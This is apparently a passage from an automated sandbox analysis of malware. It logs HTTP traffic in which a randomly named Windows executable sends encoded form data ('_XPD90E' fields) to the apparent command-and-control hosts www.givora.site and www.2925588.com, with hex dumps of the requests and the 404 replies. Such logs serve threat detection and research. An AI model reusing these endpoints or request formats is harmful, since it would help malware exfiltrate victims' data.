                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 37 44 63 6b 53 47 50 49 41 30 45 67 70 64 78 67 64 64 55 6a 67 50 48 64 77 47 4c 6a 43 55 61 30 4b 6e 35 53 58 44 32 6a 34 6a 4d 61 42 6b 76 35 34 78 61 4a 62 37 53 65 39 75 73 51 6a 5a 57 36 6c 2b 67 70 61 38 33 57 37 30 53 54 78 66 38 32 35 72 49 46 37 38 55 2f 74 68 43 36 67 65 4b 7a 78 64 4c 59 77 35 47 45 37 75 45 4e 42 53 2f 42 64 53 57 52 6d 35 75 51 6e 71 47 2f 78 42 77 49 57 42 52 59 56 57 6a 46 56 42 33 43 2b 53 53 45 65 63 74 42 37 35 6b 4a 53 62 37 41 78 72 7a 65 34 7a 37 38 33 52 6c 62 76 37 4b 67 35 33 41 53 4c 6f 64 50 68 6b 68 55 59 2b 47 79 53 4e 54 57 4f 77 3d 3d
                                                                                                      Data Ascii: _XPD90E=7DckSGPIA0EgpdxgddUjgPHdwGLjCUa0Kn5SXD2j4jMaBkv54xaJb7Se9usQjZW6l+gpa83W70STxf825rIF78U/thC6geKzxdLYw5GE7uENBS/BdSWRm5uQnqG/xBwIWBRYVWjFVB3C+SSEectB75kJSb7Axrze4z783Rlbv7Kg53ASLodPhkhUY+GySNTWOw==
                                                                                                      Oct 22, 2024 09:05:40.499548912 CEST533INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:05:40 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      14192.168.2.449972162.0.231.203805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:42.357556105 CEST732OUTPOST /855d/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.givora.site
                                                                                                      Origin: http://www.givora.site
                                                                                                      Referer: http://www.givora.site/855d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 37 44 63 6b 53 47 50 49 41 30 45 67 6f 38 42 67 66 2b 38 6a 77 66 48 65 7a 47 4c 6a 5a 45 61 6f 4b 6e 31 53 58 43 43 7a 35 56 55 61 42 41 72 35 2f 77 61 4a 59 37 53 65 31 4f 74 61 2b 4a 57 68 6c 2b 63 50 61 38 4c 57 37 30 75 54 78 62 34 32 2b 63 38 47 36 73 55 39 69 42 43 34 71 2b 4b 7a 78 64 4c 59 77 34 6d 69 37 71 51 4e 42 44 50 42 48 7a 57 53 6c 35 75 54 67 71 47 2f 6d 52 77 4d 57 42 52 66 56 54 65 51 56 43 66 43 2b 51 36 45 65 6f 35 43 78 35 6b 4c 63 37 36 74 35 4b 75 56 69 51 2b 61 2f 6e 70 34 77 5a 58 4d 38 78 4e 49 61 5a 38 59 7a 6b 46 6e 46 35 50 47 66 4f 75 66 56 37 78 4e 50 75 46 69 47 6a 41 64 70 6a 52 4f 59 65 6c 45 76 55 67 3d
                                                                                                      Data Ascii: _XPD90E=7DckSGPIA0Ego8Bgf+8jwfHezGLjZEaoKn1SXCCz5VUaBAr5/waJY7Se1Ota+JWhl+cPa8LW70uTxb42+c8G6sU9iBC4q+KzxdLYw4mi7qQNBDPBHzWSl5uTgqG/mRwMWBRfVTeQVCfC+Q6Eeo5Cx5kLc76t5KuViQ+a/np4wZXM8xNIaZ8YzkFnF5PGfOufV7xNPuFiGjAdpjROYelEvUg=
                                                                                                      Oct 22, 2024 09:05:43.030884027 CEST533INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:05:42 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      15192.168.2.449987162.0.231.203805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:44.921472073 CEST10814OUTPOST /855d/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.givora.site
                                                                                                      Origin: http://www.givora.site
                                                                                                      Referer: http://www.givora.site/855d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 37 44 63 6b 53 47 50 49 41 30 45 67 6f 38 42 67 66 2b 38 6a 77 66 48 65 7a 47 4c 6a 5a 45 61 6f 4b 6e 31 53 58 43 43 7a 35 56 63 61 43 7a 7a 35 2f 54 43 4a 5a 37 53 65 2f 75 74 5a 2b 4a 58 7a 6c 36 77 44 61 38 48 73 37 78 71 54 77 34 67 32 2f 75 55 47 7a 73 55 39 67 42 43 35 67 65 4c 75 78 65 7a 63 77 35 4b 69 37 71 51 4e 42 41 58 42 4a 79 57 53 6f 5a 75 51 6e 71 47 72 78 42 77 30 57 42 4a 51 56 53 72 72 56 7a 2f 43 2b 77 4b 45 4e 75 46 43 35 35 6b 46 52 62 36 31 35 4b 69 61 69 54 61 42 2f 6e 31 43 77 62 4c 4d 39 48 4e 51 47 59 51 76 69 31 64 55 48 4c 4c 56 62 50 4b 6e 62 4b 46 59 41 4f 56 44 55 43 38 72 6d 7a 4d 61 41 65 34 46 35 67 4a 65 44 4c 32 70 62 65 5a 51 37 32 56 53 34 63 41 54 6f 53 79 61 33 48 35 6d 73 34 41 47 31 64 67 30 49 6c 2b 38 49 6a 4d 7a 69 6f 68 6d 63 39 57 4c 56 35 54 4f 54 6c 59 75 30 47 61 31 38 43 4a 65 4d 72 42 58 4d 69 66 30 71 75 47 4b 57 58 78 5a 42 58 61 4b 73 67 4c 67 75 79 33 6c 74 2b 53 6e 4f 36 4a 63 46 44 76 41 52 72 32 30 7a 76 51 6d 5a 7a [TRUNCATED]
                                                                                                      Data Ascii: _XPD90E=7DckSGPIA0Ego8Bgf+8jwfHezGLjZEaoKn1SXCCz5VcaCzz5/TCJZ7Se/utZ+JXzl6wDa8Hs7xqTw4g2/uUGzsU9gBC5geLuxezcw5Ki7qQNBAXBJyWSoZuQnqGrxBw0WBJQVSrrVz/C+wKENuFC55kFRb615KiaiTaB/n1CwbLM9HNQGYQvi1dUHLLVbPKnbKFYAOVDUC8rmzMaAe4F5gJeDL2pbeZQ72VS4cAToSya3H5ms4AG1dg0Il+8IjMziohmc9WLV5TOTlYu0Ga18CJeMrBXMif0quGKWXxZBXaKsgLguy3lt+SnO6JcFDvARr20zvQmZzrjAAcRBIs0RPOxM0E5bm0oHkr7aMk3o5B0u+T68Bag/9i64tZoeJG+JuEr+XqvjwcSurbtrgq5Iv5sQKXQOgmcE/upxHjQDF9kXlFhhpSMubIEASiPa1uZQ2wukNxjaJj/351vOsQBUyte0SlfkqSoWbfJNXHWA5hHNw7A6JHURtBVYrfI8bNDxYu2tdvhOMZ7jhetPS1BL0ZEDZvybtvslhhHts8m0ZImjqp8A0SFIyaGHZm3mYRl06NFlO74u0hKkFATgQqzZFrtn5VxyicfBMZ/dWPBJcXM2w+56L2SFT1OUrr7EAvZORFFreybsK4n4vPyBytTPv7olaUwMwQuAwVDQe2hdpk/1tqAdFvr5jo4EXpP6y9HiZqf4ARZCUt1o2UiiGDpLNaWOo1CmqwW/KYy8dNlw8bGfVNKyi1y+LH3a7GuGRWOcEsEBRFFMZRjSWCevzr0AQXa1kitsPSJMEVqN0Z9nyfULEaQG3tWFP8xq24vdWnq0EyqIrshKOqool6F8JAPkjwF5G7E+bSkG3BRRWtpg7rrLt2hyD0wZCL5R60z9qIdxUV1PK/VcxzJVBG+hM/egZ0osdThoRSXiW/aWYbjbJdkYZKkFBmE9PHRsfPs33xDQoml5i/FmR5mpza9iYhD/RWZ+lnYKc/9gJoFsJJL8VZr [TRUNCATED]
                                                                                                      Oct 22, 2024 09:05:45.872486115 CEST533INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:05:45 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      16192.168.2.449997162.0.231.203805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:47.487998962 CEST449OUTGET /855d/?_XPD90E=2B0ERzH0P28lwthdevcVhvj9llT5BlecEDtAIyO4xBEaITWb1iLHHs/q7NYM0I/g8MkSYcfxzku7nIYL4eoSssJTtiqjkpOnyuaVgJz/zdISSnDhIUOFk8Y=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.givora.site
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:05:48.165419102 CEST548INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:05:48 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      17192.168.2.450023103.71.154.12805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:53.368431091 CEST712OUTPOST /jx6k/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.2925588.com
                                                                                                      Origin: http://www.2925588.com
                                                                                                      Referer: http://www.2925588.com/jx6k/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 57 63 43 32 46 2b 6e 7a 45 57 35 4f 61 36 50 6b 6a 56 75 6f 70 66 2b 45 48 51 62 50 78 70 6b 47 73 42 45 51 31 4a 47 6c 48 2f 47 76 44 47 69 52 66 47 63 31 35 35 6c 44 33 2b 54 4b 52 58 45 78 75 78 37 7a 32 66 38 72 4f 50 4d 4a 73 6b 6a 30 58 6f 54 49 63 48 31 73 31 46 30 33 5a 66 58 61 63 56 43 32 54 73 74 56 72 4c 5a 2f 32 64 65 6e 34 47 72 4c 47 43 77 75 38 38 38 4a 4d 6d 57 62 41 4c 71 68 4f 76 73 58 65 4a 68 73 64 39 34 63 62 58 34 5a 68 73 58 6d 76 52 2f 2f 75 61 4e 70 71 41 61 30 34 39 61 66 4e 4f 42 53 30 2f 50 77 45 67 36 67 6d 44 43 43 6f 55 67 42 66 32 32 62 68 67 3d 3d
                                                                                                      Data Ascii: _XPD90E=WcC2F+nzEW5Oa6PkjVuopf+EHQbPxpkGsBEQ1JGlH/GvDGiRfGc155lD3+TKRXExux7z2f8rOPMJskj0XoTIcH1s1F03ZfXacVC2TstVrLZ/2den4GrLGCwu888JMmWbALqhOvsXeJhsd94cbX4ZhsXmvR//uaNpqAa049afNOBS0/PwEg6gmDCCoUgBf22bhg==
                                                                                                      Oct 22, 2024 09:05:54.302256107 CEST289INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 22 Oct 2024 07:05:54 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 146
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      18192.168.2.450025103.71.154.12805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:55.917819023 CEST732OUTPOST /jx6k/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.2925588.com
                                                                                                      Origin: http://www.2925588.com
                                                                                                      Referer: http://www.2925588.com/jx6k/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 57 63 43 32 46 2b 6e 7a 45 57 35 4f 63 5a 58 6b 68 32 47 6f 34 76 2b 48 4a 77 62 50 34 4a 6b 43 73 42 59 51 31 49 7a 34 48 4b 32 76 44 6e 53 52 65 48 63 31 77 70 6c 44 34 75 54 4c 4f 6e 45 71 75 78 6d 41 32 64 34 72 4f 4c 6b 4a 73 6c 54 30 57 66 6e 4a 63 58 31 75 75 31 30 31 48 76 58 61 63 56 43 32 54 73 34 34 72 4c 52 2f 31 75 47 6e 35 6b 53 35 46 43 77 68 2f 38 38 4a 49 6d 57 41 41 4c 71 35 4f 74 49 39 65 4d 6c 73 64 34 38 63 62 43 59 61 32 63 58 38 78 68 2f 72 6a 36 74 67 6e 54 79 34 6d 65 32 34 46 71 5a 55 31 35 43 71 56 52 62 33 30 44 6d 78 31 54 70 31 53 31 4c 53 36 6f 6f 44 65 7a 4e 4b 30 77 31 70 4d 68 75 30 65 52 69 68 70 71 30 3d
                                                                                                      Data Ascii: _XPD90E=WcC2F+nzEW5OcZXkh2Go4v+HJwbP4JkCsBYQ1Iz4HK2vDnSReHc1wplD4uTLOnEquxmA2d4rOLkJslT0WfnJcX1uu101HvXacVC2Ts44rLR/1uGn5kS5FCwh/88JImWAALq5OtI9eMlsd48cbCYa2cX8xh/rj6tgnTy4me24FqZU15CqVRb30Dmx1Tp1S1LS6ooDezNK0w1pMhu0eRihpq0=
                                                                                                      Oct 22, 2024 09:05:56.859261990 CEST289INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 22 Oct 2024 07:05:56 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 146
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      19192.168.2.450026103.71.154.12805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:58.468015909 CEST10814OUTPOST /jx6k/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.2925588.com
                                                                                                      Origin: http://www.2925588.com
                                                                                                      Referer: http://www.2925588.com/jx6k/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 57 63 43 32 46 2b 6e 7a 45 57 35 4f 63 5a 58 6b 68 32 47 6f 34 76 2b 48 4a 77 62 50 34 4a 6b 43 73 42 59 51 31 49 7a 34 48 4c 69 76 44 78 75 52 65 67 49 31 69 35 6c 44 2b 65 54 47 4f 6e 45 72 75 78 76 6f 32 64 30 56 4f 4e 67 4a 74 47 4c 30 48 62 37 4a 58 58 31 75 78 46 30 30 5a 66 58 50 63 56 53 79 54 73 6f 34 72 4c 52 2f 31 76 32 6e 2b 32 71 35 44 43 77 75 38 38 38 4e 4d 6d 58 4f 41 4c 79 44 4f 74 4d 48 65 34 52 73 61 59 73 63 64 32 34 61 71 4d 58 36 77 68 2b 73 6a 36 67 34 6e 54 76 4c 6d 66 43 43 46 74 35 55 30 64 76 77 46 68 65 75 6c 54 32 37 72 6a 42 72 51 6d 6a 79 39 66 59 63 50 78 6c 51 6e 68 49 48 49 44 76 44 4b 6b 75 68 2f 4f 34 44 6e 46 65 56 68 45 70 32 6e 4e 68 5a 37 51 48 46 2f 72 51 37 68 6e 2f 52 4a 31 55 73 6d 4a 47 63 30 45 6c 56 35 39 79 57 63 2f 36 6c 75 75 34 33 34 2b 79 62 69 74 56 35 6a 75 58 6b 49 45 76 50 47 5a 45 46 63 66 37 66 33 4e 46 65 32 6c 6d 66 74 6b 73 4e 6b 63 69 79 31 68 45 66 4f 53 33 31 4e 67 59 70 30 41 64 76 6e 6a 7a 52 42 51 6a 42 33 58 [TRUNCATED]
